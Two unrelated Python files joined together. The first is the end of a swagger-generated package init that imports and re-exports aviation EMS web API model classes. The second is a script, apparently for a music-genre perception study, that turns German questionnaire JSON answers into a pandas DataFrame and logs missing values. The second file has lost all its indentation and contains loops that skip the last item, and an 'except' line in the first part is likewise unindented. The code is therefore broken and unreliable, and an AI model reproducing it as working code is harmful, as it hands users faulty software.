from .adi_ems_web_api_v2_dto_weather_metar_metar_query_py3 import AdiEmsWebApiV2DtoWeatherMetarMetarQuery
from .adi_ems_web_api_v2_dto_weather_weather_report_py3 import AdiEmsWebApiV2DtoWeatherWeatherReport
except (SyntaxError, ImportError):
from .adi_ems_web_api_v2_model_analytic_analytic_id import AdiEmsWebApiV2ModelAnalyticAnalyticId
from .adi_ems_web_api_v2_dto_analytic_info import AdiEmsWebApiV2DtoAnalyticInfo
from .adi_ems_web_api_model_error import AdiEmsWebApiModelError
from .adi_ems_web_api_v2_dto_analytic_group import AdiEmsWebApiV2DtoAnalyticGroup
from .adi_ems_web_api_v2_dto_analytic_group_contents import AdiEmsWebApiV2DtoAnalyticGroupContents
from .adi_ems_web_api_v2_model_analytic_analytic_select import AdiEmsWebApiV2ModelAnalyticAnalyticSelect
from .adi_ems_web_api_v2_model_analytic_offset_type import AdiEmsWebApiV2ModelAnalyticOffsetType
from .adi_ems_web_api_v2_model_analytic_query import AdiEmsWebApiV2ModelAnalyticQuery
from .adi_ems_web_api_v2_model_analytic_analytic_result import AdiEmsWebApiV2ModelAnalyticAnalyticResult
from .adi_ems_web_api_v2_model_analytic_query_result import AdiEmsWebApiV2ModelAnalyticQueryResult
from .adi_ems_web_api_v2_dto_metadata_item import AdiEmsWebApiV2DtoMetadataItem
from .adi_ems_web_api_v2_dto_metadata import AdiEmsWebApiV2DtoMetadata
from .adi_ems_web_api_core_dto_data_range import AdiEmsWebApiCoreDtoDataRange
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_item import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetItem
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set import AdiEmsWebApiV2DtoAnalyticSetAnalyticSet
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_group import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetGroup
from .adi_ems_web_api_v2_dto_asset_fleet import AdiEmsWebApiV2DtoAssetFleet
from .adi_ems_web_api_v2_dto_asset_aircraft import AdiEmsWebApiV2DtoAssetAircraft
from .adi_ems_web_api_v2_dto_asset_flight_phase import AdiEmsWebApiV2DtoAssetFlightPhase
from .adi_ems_web_api_v2_dto_asset_airport import AdiEmsWebApiV2DtoAssetAirport
from .adi_ems_web_api_v2_dto_schema_primary_key_field import AdiEmsWebApiV2DtoSchemaPrimaryKeyField
from .adi_ems_web_api_v2_dto_schema_database import AdiEmsWebApiV2DtoSchemaDatabase
from .adi_ems_web_api_v2_dto_schema_database_group import AdiEmsWebApiV2DtoSchemaDatabaseGroup
from .adi_ems_web_api_v2_dto_schema_field import AdiEmsWebApiV2DtoSchemaField
from .adi_ems_web_api_v2_dto_schema_field_group import AdiEmsWebApiV2DtoSchemaFieldGroup
from .adi_ems_web_api_v2_dto_schema_select_column import AdiEmsWebApiV2DtoSchemaSelectColumn
from .adi_ems_web_api_v2_dto_schema_group_by_column import AdiEmsWebApiV2DtoSchemaGroupByColumn
from .adi_ems_web_api_v2_dto_schema_order_by_column import AdiEmsWebApiV2DtoSchemaOrderByColumn
from .adi_ems_web_api_v2_dto_schema_filter_argument import AdiEmsWebApiV2DtoSchemaFilterArgument
from .adi_ems_web_api_v2_dto_schema_filter import AdiEmsWebApiV2DtoSchemaFilter
from .adi_ems_web_api_v2_dto_schema_query import AdiEmsWebApiV2DtoSchemaQuery
from .adi_ems_web_api_v2_dto_schema_query_result_header import AdiEmsWebApiV2DtoSchemaQueryResultHeader
from .adi_ems_web_api_v2_dto_schema_query_result import AdiEmsWebApiV2DtoSchemaQueryResult
from .adi_ems_web_api_v2_dto_schema_async_query_info import AdiEmsWebApiV2DtoSchemaAsyncQueryInfo
from .adi_ems_web_api_v2_dto_schema_async_query_data import AdiEmsWebApiV2DtoSchemaAsyncQueryData
from .adi_ems_web_api_v2_dto_schema_column import AdiEmsWebApiV2DtoSchemaColumn
from .adi_ems_web_api_v2_dto_schema_create import AdiEmsWebApiV2DtoSchemaCreate
from .adi_ems_web_api_v2_dto_schema_create_result import AdiEmsWebApiV2DtoSchemaCreateResult
from .adi_ems_web_api_v2_dto_schema_update import AdiEmsWebApiV2DtoSchemaUpdate
from .adi_ems_web_api_v2_dto_schema_update_result import AdiEmsWebApiV2DtoSchemaUpdateResult
from .adi_ems_web_api_v2_dto_schema_delete import AdiEmsWebApiV2DtoSchemaDelete
from .adi_ems_web_api_v2_dto_schema_delete_result import AdiEmsWebApiV2DtoSchemaDeleteResult
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_value import AdiEmsWebApiV2DtoEmsProfileProfileResultValue
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_comment import AdiEmsWebApiV2DtoEmsProfileProfileResultComment
from .adi_ems_web_api_v2_dto_ems_profile_profile_results_event_record import AdiEmsWebApiV2DtoEmsProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_ems_profile_profile_results import AdiEmsWebApiV2DtoEmsProfileProfileResults
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile import AdiEmsWebApiV2DtoEmsProfileEmsProfile
from .adi_ems_web_api_v2_dto_ems_profile_glossary_item import AdiEmsWebApiV2DtoEmsProfileGlossaryItem
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile_glossary import AdiEmsWebApiV2DtoEmsProfileEmsProfileGlossary
from .adi_ems_web_data_model_ems_system import AdiEmsWebDataModelEmsSystem
from .adi_ems_web_api_v2_dto_navigation_navigation_airport import AdiEmsWebApiV2DtoNavigationNavigationAirport
from .adi_ems_web_api_v2_dto_navigation_navigation_runway import AdiEmsWebApiV2DtoNavigationNavigationRunway
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure import AdiEmsWebApiV2DtoNavigationNavigationProcedure
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment_navaid import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegmentNavaid
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegment
from .adi_ems_web_api_v2_dto_navigation_navigation_waypoint import AdiEmsWebApiV2DtoNavigationNavigationWaypoint
from .adi_ems_web_api_v2_dto_navigation_navigation_navaid import AdiEmsWebApiV2DtoNavigationNavigationNavaid
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_item import AdiEmsWebApiV2DtoParameterSetParameterSetItem
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set import AdiEmsWebApiV2DtoParameterSetParameterSet
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_group import AdiEmsWebApiV2DtoParameterSetParameterSetGroup
from .adi_ems_web_api_v2_dto_profile_profile_result_value import AdiEmsWebApiV2DtoProfileProfileResultValue
from .adi_ems_web_api_v2_dto_profile_profile_result_comment import AdiEmsWebApiV2DtoProfileProfileResultComment
from .adi_ems_web_api_v2_dto_profile_profile_results_event_record import AdiEmsWebApiV2DtoProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_profile_processing_information import AdiEmsWebApiV2DtoProfileProcessingInformation
from .adi_ems_web_api_v2_dto_profile_profile_results import AdiEmsWebApiV2DtoProfileProfileResults
from .adi_ems_web_api_v2_dto_profile_profile import AdiEmsWebApiV2DtoProfileProfile
from .adi_ems_web_api_v2_dto_profile_profile_group import AdiEmsWebApiV2DtoProfileProfileGroup
from .adi_ems_web_api_v2_dto_profile_glossary_item import AdiEmsWebApiV2DtoProfileGlossaryItem
from .adi_ems_web_api_v2_dto_profile_profile_glossary import AdiEmsWebApiV2DtoProfileProfileGlossary
from .adi_ems_web_api_v2_dto_profile_event import AdiEmsWebApiV2DtoProfileEvent
from .adi_ems_web_api_v2_model_tableau_trusted import AdiEmsWebApiV2ModelTableauTrusted
from .adi_ems_web_api_v2_model_tableau_tableau_server import AdiEmsWebApiV2ModelTableauTableauServer
from .adi_ems_web_shared_tableau_rest_site import AdiEmsWebSharedTableauRestSite
from .adi_ems_web_shared_tableau_rest_project import AdiEmsWebSharedTableauRestProject
from .adi_ems_web_shared_tableau_rest_user import AdiEmsWebSharedTableauRestUser
from .adi_ems_web_shared_tableau_rest_tag import AdiEmsWebSharedTableauRestTag
from .adi_ems_web_shared_tableau_rest_tags import AdiEmsWebSharedTableauRestTags
from .adi_ems_web_shared_tableau_rest_view import AdiEmsWebSharedTableauRestView
from .adi_ems_web_shared_tableau_rest_views import AdiEmsWebSharedTableauRestViews
from .adi_ems_web_shared_tableau_rest_workbook import AdiEmsWebSharedTableauRestWorkbook
from .adi_ems_web_api_v2_dto_trajectory_value import AdiEmsWebApiV2DtoTrajectoryValue
from .adi_ems_web_api_v2_dto_trajectory_value_array import AdiEmsWebApiV2DtoTrajectoryValueArray
from .adi_ems_web_api_v2_dto_trajectory_configuration import AdiEmsWebApiV2DtoTrajectoryConfiguration
from .adi_ems_web_api_v2_dto_upload_upload_request import AdiEmsWebApiV2DtoUploadUploadRequest
from .adi_ems_web_api_v2_dto_upload_upload_parameters import AdiEmsWebApiV2DtoUploadUploadParameters
from .adi_ems_web_api_v2_dto_upload_upload_result import AdiEmsWebApiV2DtoUploadUploadResult
from .adi_ems_web_api_v2_dto_upload_upload_status import AdiEmsWebApiV2DtoUploadUploadStatus
from .adi_ems_web_api_v2_dto_upload_upload_record import AdiEmsWebApiV2DtoUploadUploadRecord
from .adi_ems_web_api_v2_dto_upload_upload_processing_flight_status import AdiEmsWebApiV2DtoUploadUploadProcessingFlightStatus
from .adi_ems_web_api_v2_dto_upload_upload_processing_status import AdiEmsWebApiV2DtoUploadUploadProcessingStatus
from .adi_ems_web_api_v2_dto_upload_bucket import AdiEmsWebApiV2DtoUploadBucket
from .adi_ems_web_api_v2_dto_weather_taf_taf_parse_options import AdiEmsWebApiV2DtoWeatherTafTafParseOptions
from .adi_ems_web_api_v2_dto_weather_cloud_condition import AdiEmsWebApiV2DtoWeatherCloudCondition
from .adi_ems_web_api_v2_dto_weather_taf_icing_condition import AdiEmsWebApiV2DtoWeatherTafIcingCondition
from .adi_ems_web_api_v2_dto_weather_taf_turbulence_condition import AdiEmsWebApiV2DtoWeatherTafTurbulenceCondition
from .adi_ems_web_api_v2_dto_weather_taf_temperature import AdiEmsWebApiV2DtoWeatherTafTemperature
from .adi_ems_web_api_v2_dto_weather_taf_prediction import AdiEmsWebApiV2DtoWeatherTafPrediction
from .adi_ems_web_api_v2_dto_weather_taf_taf_report import AdiEmsWebApiV2DtoWeatherTafTafReport
from .adi_ems_web_api_v2_dto_weather_metar_metar_parse_options import AdiEmsWebApiV2DtoWeatherMetarMetarParseOptions
from .adi_ems_web_api_v2_dto_weather_metar_runway_visual_range import AdiEmsWebApiV2DtoWeatherMetarRunwayVisualRange
from .adi_ems_web_api_v2_dto_weather_weather_phenomenon import AdiEmsWebApiV2DtoWeatherWeatherPhenomenon
from .adi_ems_web_api_v2_dto_weather_metar_runway_condition import AdiEmsWebApiV2DtoWeatherMetarRunwayCondition
from .adi_ems_web_api_v2_dto_weather_metar_metar_report import AdiEmsWebApiV2DtoWeatherMetarMetarReport
from .adi_ems_web_api_v2_dto_weather_taf_taf_query import AdiEmsWebApiV2DtoWeatherTafTafQuery
from .adi_ems_web_api_v2_dto_weather_metar_metar_query import AdiEmsWebApiV2DtoWeatherMetarMetarQuery
from .adi_ems_web_api_v2_dto_weather_weather_report import AdiEmsWebApiV2DtoWeatherWeatherReport
# Public API of this swagger-generated models package: every DTO/model class
# imported above is re-exported by name so that `from <package> import *`
# exposes the complete set of generated types. The ordering mirrors the
# import order; entries near the top correspond to imports earlier in the
# file (outside this view).
__all__ = [
    'AdiEmsWebApiV2ModelAnalyticAnalyticId',
    'AdiEmsWebApiV2DtoAnalyticInfo',
    'AdiEmsWebApiModelError',
    'AdiEmsWebApiV2DtoAnalyticGroup',
    'AdiEmsWebApiV2DtoAnalyticGroupContents',
    'AdiEmsWebApiV2ModelAnalyticAnalyticSelect',
    'AdiEmsWebApiV2ModelAnalyticOffsetType',
    'AdiEmsWebApiV2ModelAnalyticQuery',
    'AdiEmsWebApiV2ModelAnalyticAnalyticResult',
    'AdiEmsWebApiV2ModelAnalyticQueryResult',
    'AdiEmsWebApiV2DtoMetadataItem',
    'AdiEmsWebApiV2DtoMetadata',
    'AdiEmsWebApiCoreDtoDataRange',
    'AdiEmsWebApiV2DtoAnalyticSetAnalyticSetItem',
    'AdiEmsWebApiV2DtoAnalyticSetAnalyticSet',
    'AdiEmsWebApiV2DtoAnalyticSetAnalyticSetGroup',
    'AdiEmsWebApiV2DtoAssetFleet',
    'AdiEmsWebApiV2DtoAssetAircraft',
    'AdiEmsWebApiV2DtoAssetFlightPhase',
    'AdiEmsWebApiV2DtoAssetAirport',
    'AdiEmsWebApiV2DtoSchemaPrimaryKeyField',
    'AdiEmsWebApiV2DtoSchemaDatabase',
    'AdiEmsWebApiV2DtoSchemaDatabaseGroup',
    'AdiEmsWebApiV2DtoSchemaField',
    'AdiEmsWebApiV2DtoSchemaFieldGroup',
    'AdiEmsWebApiV2DtoSchemaSelectColumn',
    'AdiEmsWebApiV2DtoSchemaGroupByColumn',
    'AdiEmsWebApiV2DtoSchemaOrderByColumn',
    'AdiEmsWebApiV2DtoSchemaFilterArgument',
    'AdiEmsWebApiV2DtoSchemaFilter',
    'AdiEmsWebApiV2DtoSchemaQuery',
    'AdiEmsWebApiV2DtoSchemaQueryResultHeader',
    'AdiEmsWebApiV2DtoSchemaQueryResult',
    'AdiEmsWebApiV2DtoSchemaAsyncQueryInfo',
    'AdiEmsWebApiV2DtoSchemaAsyncQueryData',
    'AdiEmsWebApiV2DtoSchemaColumn',
    'AdiEmsWebApiV2DtoSchemaCreate',
    'AdiEmsWebApiV2DtoSchemaCreateResult',
    'AdiEmsWebApiV2DtoSchemaUpdate',
    'AdiEmsWebApiV2DtoSchemaUpdateResult',
    'AdiEmsWebApiV2DtoSchemaDelete',
    'AdiEmsWebApiV2DtoSchemaDeleteResult',
    'AdiEmsWebApiV2DtoEmsProfileProfileResultValue',
    'AdiEmsWebApiV2DtoEmsProfileProfileResultComment',
    'AdiEmsWebApiV2DtoEmsProfileProfileResultsEventRecord',
    'AdiEmsWebApiV2DtoEmsProfileProfileResults',
    'AdiEmsWebApiV2DtoEmsProfileEmsProfile',
    'AdiEmsWebApiV2DtoEmsProfileGlossaryItem',
    'AdiEmsWebApiV2DtoEmsProfileEmsProfileGlossary',
    'AdiEmsWebDataModelEmsSystem',
    'AdiEmsWebApiV2DtoNavigationNavigationAirport',
    'AdiEmsWebApiV2DtoNavigationNavigationRunway',
    'AdiEmsWebApiV2DtoNavigationNavigationProcedure',
    'AdiEmsWebApiV2DtoNavigationNavigationProcedureSegmentNavaid',
    'AdiEmsWebApiV2DtoNavigationNavigationProcedureSegment',
    'AdiEmsWebApiV2DtoNavigationNavigationWaypoint',
    'AdiEmsWebApiV2DtoNavigationNavigationNavaid',
    'AdiEmsWebApiV2DtoParameterSetParameterSetItem',
    'AdiEmsWebApiV2DtoParameterSetParameterSet',
    'AdiEmsWebApiV2DtoParameterSetParameterSetGroup',
    'AdiEmsWebApiV2DtoProfileProfileResultValue',
    'AdiEmsWebApiV2DtoProfileProfileResultComment',
    'AdiEmsWebApiV2DtoProfileProfileResultsEventRecord',
    'AdiEmsWebApiV2DtoProfileProcessingInformation',
    'AdiEmsWebApiV2DtoProfileProfileResults',
    'AdiEmsWebApiV2DtoProfileProfile',
    'AdiEmsWebApiV2DtoProfileProfileGroup',
    'AdiEmsWebApiV2DtoProfileGlossaryItem',
    'AdiEmsWebApiV2DtoProfileProfileGlossary',
    'AdiEmsWebApiV2DtoProfileEvent',
    'AdiEmsWebApiV2ModelTableauTrusted',
    'AdiEmsWebApiV2ModelTableauTableauServer',
    'AdiEmsWebSharedTableauRestSite',
    'AdiEmsWebSharedTableauRestProject',
    'AdiEmsWebSharedTableauRestUser',
    'AdiEmsWebSharedTableauRestTag',
    'AdiEmsWebSharedTableauRestTags',
    'AdiEmsWebSharedTableauRestView',
    'AdiEmsWebSharedTableauRestViews',
    'AdiEmsWebSharedTableauRestWorkbook',
    'AdiEmsWebApiV2DtoTrajectoryValue',
    'AdiEmsWebApiV2DtoTrajectoryValueArray',
    'AdiEmsWebApiV2DtoTrajectoryConfiguration',
    'AdiEmsWebApiV2DtoUploadUploadRequest',
    'AdiEmsWebApiV2DtoUploadUploadParameters',
    'AdiEmsWebApiV2DtoUploadUploadResult',
    'AdiEmsWebApiV2DtoUploadUploadStatus',
    'AdiEmsWebApiV2DtoUploadUploadRecord',
    'AdiEmsWebApiV2DtoUploadUploadProcessingFlightStatus',
    'AdiEmsWebApiV2DtoUploadUploadProcessingStatus',
    'AdiEmsWebApiV2DtoUploadBucket',
    'AdiEmsWebApiV2DtoWeatherTafTafParseOptions',
    'AdiEmsWebApiV2DtoWeatherCloudCondition',
    'AdiEmsWebApiV2DtoWeatherTafIcingCondition',
    'AdiEmsWebApiV2DtoWeatherTafTurbulenceCondition',
    'AdiEmsWebApiV2DtoWeatherTafTemperature',
    'AdiEmsWebApiV2DtoWeatherTafPrediction',
    'AdiEmsWebApiV2DtoWeatherTafTafReport',
    'AdiEmsWebApiV2DtoWeatherMetarMetarParseOptions',
    'AdiEmsWebApiV2DtoWeatherMetarRunwayVisualRange',
    'AdiEmsWebApiV2DtoWeatherWeatherPhenomenon',
    'AdiEmsWebApiV2DtoWeatherMetarRunwayCondition',
    'AdiEmsWebApiV2DtoWeatherMetarMetarReport',
    'AdiEmsWebApiV2DtoWeatherTafTafQuery',
    'AdiEmsWebApiV2DtoWeatherMetarMetarQuery',
    'AdiEmsWebApiV2DtoWeatherWeatherReport',
]
|
<filename>validation/analysis_questionnaire.py
# analysis_questionnaire.py
# function to read out information, create and save data frames to .csv
# files from results .json files from the music
# genre stimuli questionnaire
def analysis_questionnaire(json_file):
'''inputs should be a participant specific questionnaire file (in .json)
e.g. analysis_questionnaire(test_participant.json)'''
# import important modules
import os
import json
import pandas as pd
# open and load .json file, creating a dict
q_json=json.load(open(json_file))
# assign id
id=str(json_file.split('ergebnisstring_', 1)[1].split('.json',1)[0])
# open an error log file to store all missing values, etc.
f = open("error_log" + id + ".txt", "w")
# create pandas data frame to store converted information
q_data = pd.DataFrame(columns=['age', 'sex', 'handedness', 'education', 'job', 'hearing', 'hearing_dis',
'neuro_psych', 'music_pref_all', 'music_pref', 'band_pref', 'dur_music_day', \
'purpose_music', 'occasion_music', 'active_music_cur', 'active_music_cur_dur', \
'active_music_past', 'active_music_past_dur', 'importance_music', 'chills_often', 'chills_int', \
'punk_sortable', 'punk_sortable_sure', 'punk_know', \
'alternative_sortable', 'alternative_sortable_sure', 'alternative_know', \
'heavymetal_sortable', 'heavymetal_sortable_sure', 'heavymetal_know', \
'psychedelic_sortable', 'psychedelic_sortable_sure', 'psychedelic_know', \
'rocknroll_sortable', 'rocknroll_sortable_sure', 'rocknroll_know', 'rock_all', \
'funk_sortable', 'funk_sortable_sure', 'funk_know', \
'hiphop_sortable', 'hiphop_sortable_sure', 'hiphop_know', \
'reggae_sortable', 'reggae_sortable_sure', 'reggae_know', \
'rnb_sortable', 'rnb_sortable_sure', 'rnb_know', \
'soul_sortable', 'soul_sortable_sure', 'soul_know', 'african_american_all', \
'baroque_sortable', 'baroque_sortable_sure', 'baroque_know', \
'viennese_classic_sortable', 'viennese_classic_sortable_sure', 'viennese_classic_know', \
'modern_classic_sortable', 'modern_classic_sortable_sure', 'modern_classic_know', \
'renaissance_sortable', 'renaissance_sortable_sure', 'renaissance_know', \
'romantic_sortable', 'romantic_sortable_sure', 'romantic_know', 'classic_all', \
'deephouse_sortable', 'deephouse_sortable_sure', 'deephouse_know', \
'drumnbass_sortable', 'drumnbass_sortable_sure', 'drumnbass_know', \
'dubstep_sortable', 'dubstep_sortable_sure', 'dubstep_know', \
'techno_sortable', 'techno_sortable_sure', 'techno_know', \
'trance_sortable', 'trance_sortable_sure', 'trance_know', 'electro_all'], index=[list(range(0,10))])
## read out demographic information
# id has to be added manually to the result file when data is copied from online results
if 'id' in q_json:
q_data['id'][0] = int(q_json['id'])
if 'Alter' in q_json:
q_data['age'][0] = str(q_json['Alter'])
else:
f.write('missing_value_age\n')
if 'Geschlecht' in q_json:
q_data['sex'][0] = str(q_json['Geschlecht'])
else:
f.write('missing_value_sex\n')
if 'Haendigkeit' in q_json:
q_data['handedness'][0] = str(q_json['Haendigkeit'])
else:
f.write('missing_value_handedness\n')
if 'Hoechster Bildungsabschluss' in q_json:
q_data['education'][0] = str(q_json['Hoechster Bildungsabschluss'])
else:
f.write('education\n')
if 'Beruf (wenn Student: Studienfach)' in q_json:
q_data['job'][0] = str(q_json['Beruf (wenn Student: Studienfach)'])
else:
f.write('missing_value_job\n')
if 'Wie wuerden Sie Ihre Hoerfaehigkeit einschaetzen?' in q_json:
q_data['hearing'][0] = str(q_json['Wie wuerden Sie Ihre Hoerfaehigkeit einschaetzen?'])
else:
f.write('missing_value_hearing\n')
if 'Hatten Sie schon mal oder haben Sie...' in q_json:
q_data['hearing_dis'][0] = str(q_json['Hatten Sie schon mal oder haben Sie...'])
else:
f.write('missing_value_hearing_dis\n')
if 'Hatten oder haben Sie eine neurologische oder psychiatrische Erkrankung?' in q_json:
q_data['neuro_psych'][0] = str(q_json['Hatten oder haben Sie eine neurologische oder psychiatrische Erkrankung?'])
else:
f.write('missing_value_neuro_psych\n')
if 'Bitte geben Sie Ihre generelle Praeferenz fuer jedes der folgenden Musikgenres anhand der bereitgestellten Skala an.' in q_json:
q_data_music_pref_all = q_json['Bitte geben Sie Ihre generelle Praeferenz fuer jedes der folgenden Musikgenres anhand der bereitgestellten Skala an.']
if len(q_data_music_pref_all)==23:
for i in range(1,len(q_data_music_pref_all)+1):
q_data['music_pref_all'][i-1]=int(q_data_music_pref_all[str(i)])
else:
f.write('music pref all not complete\n')
else:
f.write('music pref all missing\n')
if 'Welche von den angegebenen Musikstilen bevorzugen Sie?' in q_json:
q_data_music_pref = q_json['Welche von den angegebenen Musikstilen bevorzugen Sie?']
if len(q_data_music_pref)==11:
for i in range(1,len(q_data_music_pref)):
q_data['music_pref'][i-1]=int(q_data_music_pref[str(i)])
else:
f.write('music_pref_not_complete\n')
else:
f.write('music_pref_missing\n')
if 'Welches ist Ihre Lieblingsband/Musikgruppe und welchem Musikstil ist diese zuzuordnen (max. 3)?' in q_json:
q_data['band_pref'][0] = str(q_json['Welches ist Ihre Lieblingsband/Musikgruppe und welchem Musikstil ist diese zuzuordnen (max. 3)?'])
else:
f.write('missing_value_band_pref\n')
if 'Wie lange hoeren Sie an einem typischen Tag Musik?' in q_json:
q_data['dur_music_day'][0] = str(q_json['Wie lange hoeren Sie an einem typischen Tag Musik?'])
else:
f.write('missing_value_dur_music_day\n')
if 'Zu welchem Zweck hoeren Sie Musik?' in q_json:
q_data_purpose_music = q_json['Zu welchem Zweck hoeren Sie Musik?']
if len(q_data_purpose_music)==10:
for i in range(1,len(q_data_purpose_music)):
q_data['purpose_music'][i-1]=int(q_data_purpose_music[str(i)])
else:
f.write('purpose_music_not_complete\n')
else:
f.write('purpose_music_missing\n')
if 'Zu welchen Anlaessen bzw. in welchen Situationen hoeren Sie Musik?' in q_json:
q_data_occasion_music = q_json['Zu welchen Anlaessen bzw. in welchen Situationen hoeren Sie Musik?']
if len(q_data_occasion_music)==8:
for i in range(1,len(q_data_occasion_music)):
q_data['occasion_music'][i-1]=int(q_data_occasion_music[str(i)])
else:
f.write('occasion_music_not_complete\n')
else:
f.write('occasion_purpose_music_missing\n')
if 'Machen Sie im Moment aktiv Musik?' in q_json:
q_data['active_music_cur'][0] = str(q_json['Machen Sie im Moment aktiv Musik?'])
else:
f.write('missing_value_neuro_active_music_cur\n')
if 'Wenn Sie ein Instrument spielen, welches ist es und wie lange spielen Sie schon? Wenn Sie in einem Chor oder einer Band singen, wie lange schon?' in q_json:
q_data['active_music_cur_dur'][0] = str(q_json['Wenn Sie ein Instrument spielen, welches ist es und wie lange spielen Sie schon? Wenn Sie in einem Chor oder einer Band singen, wie lange schon?'])
else:
f.write('missing_value_active_music_cur_dur\n')
if 'Haben Sie frueher aktiv Musik gemacht?' in q_json:
q_data['active_music_past'][0] = str(q_json['Haben Sie frueher aktiv Musik gemacht?'])
else:
f.write('missing_value_active_music_past\n')
if 'Wenn Sie ein Instrument spielten, welches war es und wie lange spielten Sie es? Wenn Sie in einem Chor oder einer Band sangen, wie lange?' in q_json:
q_data['active_music_past_dur'][0] = str(q_json['Wenn Sie ein Instrument spielten, welches war es und wie lange spielten Sie es? Wenn Sie in einem Chor oder einer Band sangen, wie lange?'])
else:
f.write('missing_value_active_music_dur\n')
if 'Wie wichtig ist Musik in Ihrem Leben?' in q_json:
q_data['importance_music'][0] = int(q_json['Wie wichtig ist Musik in Ihrem Leben?'])
else:
f.write('missing_value_importance_music\n')
if 'Mit der naechsten Frage moechten wir gerne herausfinden, wie oft und wie stark Sie sogenannte Chills erleben. Chills sind koerperliche Reaktionen, ein Schaudern oder Froesteln, das sich vom Kopf her ueber den Ruecken und/oder andere Teile des Koerpers ausbreitet. Es gibt diese Reaktionen in Zusammenhang mit vielen Erlebnissen wie z.B. bei Angst, Erschrecken oder beim Betrachten von Kunst. Wir moechten Sie aber bitten, dass Sie sich auf Chills beschraenken, welche Sie ausschliesslich beim Musikhoeren erleben.' in q_json:
q_data_chills_often = q_json['Mit der naechsten Frage moechten wir gerne herausfinden, wie oft und wie stark Sie sogenannte Chills erleben. Chills sind koerperliche Reaktionen, ein Schaudern oder Froesteln, das sich vom Kopf her ueber den Ruecken und/oder andere Teile des Koerpers ausbreitet. Es gibt diese Reaktionen in Zusammenhang mit vielen Erlebnissen wie z.B. bei Angst, Erschrecken oder beim Betrachten von Kunst. Wir moechten Sie aber bitten, dass Sie sich auf Chills beschraenken, welche Sie ausschliesslich beim Musikhoeren erleben.']
if len(q_data_chills_often)==1:
q_data['chills_often'][0]=q_data_chills_often['1']
else:
f.write('missing_value_chills_often\n')
else:
f.write('missing_value_chills_often\n')
if 'Falls Sie Chills erleben, geben Sie bitte an, wie intensiv Ihre erlebten Chills sind' in q_json:
q_data['chills_int'][0] = int(q_json['Falls Sie Chills erleben, geben Sie bitte an, wie intensiv Ihre erlebten Chills sind'])
else:
f.write('missing_value_chills_int\n')
### read out sortables
## read out sortables rock
# read out sortables rock - punk
q_data_punk_sortable = q_json['punk_sortable']
if len(q_data_punk_sortable)==10:
for i in range(0, len(q_json['punk_sortable'])):
q_data['punk_sortable'][i] = str(q_json['punk_sortable'][i])
else:
f.write('missing_value_punk_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Punk)?' in q_json:
q_data['punk_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Punk)?'])
else:
f.write('missing_value_punk_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Punk aus?' in q_json:
q_data['punk_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Punk aus?'])
else:
f.write('missing_value_punk_know\n')
# read out sortables rock - alternative
q_data_alternative_sortable = q_json['alternative_sortable']
if len(q_data_alternative_sortable)==10:
for i in range(0, len(q_json['alternative_sortable'])):
q_data['alternative_sortable'][i] = str(q_json['alternative_sortable'][i])
else:
f.write('missing_value_alternative_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Alternative)?' in q_json:
q_data['alternative_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Alternative)?'])
else:
f.write('missing_value_alternative_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Alternative aus?' in q_json:
q_data['alternative_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Alternative aus?'])
else:
f.write('missing_value_alternativ_know\n')
# read out sortables rock - heavymetal
q_data_heavymetal_sortable = q_json['heavymetal_sortable']
if len(q_data_heavymetal_sortable)==10:
for i in range(0, len(q_json['heavymetal_sortable'])):
q_data['heavymetal_sortable'][i] = str(q_json['heavymetal_sortable'][i])
else:
f.write('missing_value_heavymetal_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Heavy Metal)?' in q_json:
q_data['heavymetal_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Heavy Metal)?'])
else:
f.write('missing_value_heavymetal_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Heavy Metal aus?' in q_json:
q_data['heavymetal_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Heavy Metal aus?'])
else:
f.write('missing_value_heavymetal_know\n')
# read out sortables rock - psychedelic
q_data_psychedelic_sortable = q_json['psychedelic_sortable']
if len(q_data_psychedelic_sortable)==10:
for i in range(0, len(q_json['psychedelic_sortable'])):
q_data['psychedelic_sortable'][i] = str(q_json['psychedelic_sortable'][i])
else:
f.write('missing_value_psychedelic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Psychedelic)?' in q_json:
q_data['psychedelic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Psychedelic)?'])
else:
f.write('missing_value_psychedelic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Psychedelic aus?' in q_json:
q_data['psychedelic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Psychedelic aus?'])
else:
f.write('missing_value_psychedelic_know\n')
# read out sortables rock - rocknroll
q_data_rocknroll_sortable = q_json['rocknroll_sortable']
if len(q_data_rocknroll_sortable)==10:
for i in range(0, len(q_json['rocknroll_sortable'])):
q_data['rocknroll_sortable'][i] = str(q_json['rocknroll_sortable'][i])
else:
f.write('missing_value_rocknroll_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (RocknRoll)?' in q_json:
